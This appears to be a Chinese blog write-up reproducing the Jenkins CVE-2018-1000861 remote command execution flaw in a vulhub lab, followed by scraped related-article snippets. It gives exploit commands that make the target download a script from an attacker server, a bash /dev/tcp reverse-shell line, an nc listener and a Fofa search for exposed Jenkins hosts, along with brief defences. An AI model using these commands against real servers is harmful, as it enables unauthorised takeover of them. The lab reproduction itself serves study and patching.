Jenkins远程命令执行漏洞(CVE-2018-1000861复现)
1. 漏洞描述
Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。
通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。
2.环境搭建
直接使用vulhub上的环境
(1) 下载vulhub项目,然后进入到 vulhub/jenkins/CVE-2018-1000861目录下
(2) 执行命令:docker-compose up -d
(3)访问:http://192.168.222.143:8080/
3.漏洞复现
此漏洞没有回显,直接利用orange的exp执行命令反弹shell
orang的exp
https://github.com/orangetw/awesome-jenkins-rce-2019
(1).在我们的web服务器写txt文本内容为:
bash -i >& /dev/tcp/*.*.*.*/2333 0>&1
(2).使用exp.py执行以下命令下载文件
python exp.py http://192.168.222.143:8080/ "curl -o /tmp/1.sh http://192.168.0.103:85/1.txt"
(3).然后在我们接收shell的机器上监听之前写的端口
nc -lvvp 2333
(4).直接bash执行我们下载的脚本
python exp.py http://192.168.222.143:8080/ "bash /tmp/1.sh"
(5).回到监听端口的机器
可以看到已经成功获取到了shell
4. 漏洞指纹
Jenkins
5. Fofa Dork
app="Jenkins"
6. 防护方法
1.设置强口令
2.尽量不要开放到公网
3.限制来源IP
4.升级到最新版
Jenkins远程命令执行漏洞(CVE-2018-1000861复现)相关推荐
- cmd命令不识别exp_Struts2 S2061 远程命令执行漏洞(CVE202017530)复现
漏洞简介 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架.Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(C ...
- 漏洞复现----6、Jenkins远程命令执行漏洞(CVE-2018-1000861)
文章目录 一.Jenkins简介 二.CVE-2018-1000861简介 三.漏洞复现 一.Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发. 可用于自动化各种任务,如 ...
- jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞
###漏洞原理 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象.在原博文所提到的那些 Java ...
- flexpaper php 代码,FlexPaper 2.3.6 远程命令执行漏洞 附Exp
影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...
- webmin远程命令执行漏洞(cve-2019-15107)深入分析
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...
- 【注意】关于Redis存在远程命令执行漏洞的安全公告
点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...
- rmi远程反序列化rce漏洞_Oracle WebLogic 反序列化远程命令执行漏洞预警
报告编号:B6-2019-041901 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-04-19 0x00 事件背景 2019年4月17日,国家信息安全漏洞共享平台(CN ...
- ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
ThinkPHP 5.0.x.5.1.x.5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架.借鉴Struts框架的Action对象,同 ...
- 远程执行漏洞修复方案_请马上修复!SaltStack远程命令执行漏洞
[漏洞预警]SaltStack远程命令执行漏洞(CVE-2020-11651.CVE-2020-11652) 2020年5月3日,阿里云应急响应中心监测到近日国外某安全团队披露了SaltStack存在 ...
最新文章
- ValueError: Masked arrays must be 1-D
- 如何用python画函数曲线_Python笔记:用matplotlib绘制函数曲线图
- Tensorfow_yolov3 Intel Realsense D435 图像整合(合并)输入GPU计算耗时测试
- cvRemap 对图像进行普通几何变换
- 深入浅出PE文件格式---自己动手打造PE Show
- Python for 循环语句-Python 基础教程
- python扫描端口脚本_python扫描端口脚本
- python类中函数_如何在Python类中使用模块函数
- 【code】flex_进度条样式
- 国外工程师这样分析女人
- gb和gib的区别_不同软硬件环境下NVMe SSD性能简测和一些SSD测试建议
- uniapp实现苹果支付流程
- HbuilderX导入项目运行到微信小程序代码杂乱问题
- 如何在iPhone和iPad上的Safari中在网页上查找文本
- 立委科普:问答系统的前生今世
- C1认证学习五(HTTP)
- SQLite的下载与配置
- ArcGIS批量导出图片
- Android适配--dimen
- pandas loc iloc ix用法详解
热门文章
- 投稿过程要不要考虑预印本?——medRxiv那些事
- BASH 比较运算小结[转载 小蜗牛五二]
- themyleaf 图片上传_springboot thymeleaf 整合 百度富文本编辑器UEditor进行图片上传
- python123第6周答案_Python123测验6: 组合数据类型 (第6周)
- P2911 [USACO08OCT]Bovine Bones G (python3实现)
- 树莓派人脸识别_【树莓派人工智能篇】第7课 垃圾分类
- java引用数据类型可以更改类型_java,基本数据类型和引用数据类型
- Qt|OpenGL学习笔记-绕X轴、Y轴、以及XY轴旋转的四边体
- C++工作笔记-getter/setter方法中大佬的风格
- python访问数据库统一方法_Python 3.x 连接数据库(pymysql 方式)